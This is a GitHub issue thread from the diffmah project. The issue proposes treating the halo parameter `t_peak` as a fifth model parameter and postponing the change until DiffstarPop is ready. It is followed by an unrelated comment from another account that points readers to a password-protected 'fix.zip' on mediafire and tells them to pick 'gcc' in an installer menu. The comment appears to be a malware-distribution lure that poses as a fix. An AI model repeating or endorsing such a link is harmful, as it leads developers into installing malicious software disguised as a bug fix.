### ISSUE TITLE
Change `t_peak` to be a fifth diffmah parameter

### ISSUE THREAD

**Issue by aphearin** [ArgonneCPAC/diffmah#135]
In the current implementation of `diffmah_kernels.py`, the variable `t_peak` is not a model parameter, but instead is treated as extra data in the same way as the variable `lgt0`. But `t_peak` varies individually from halo to halo, and it makes more sense to treat it as a fifth model parameter.

Changing this will break a lot of code, and so it's something we should do only after we're ready to introduce a full-fledge alternative for downstream applications to use. For this reason, it may be better to postpone implementing this change until we have a working version of DiffstarPop.

Addressing this issue should happen concurrently with #134.

CC @alexalar

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
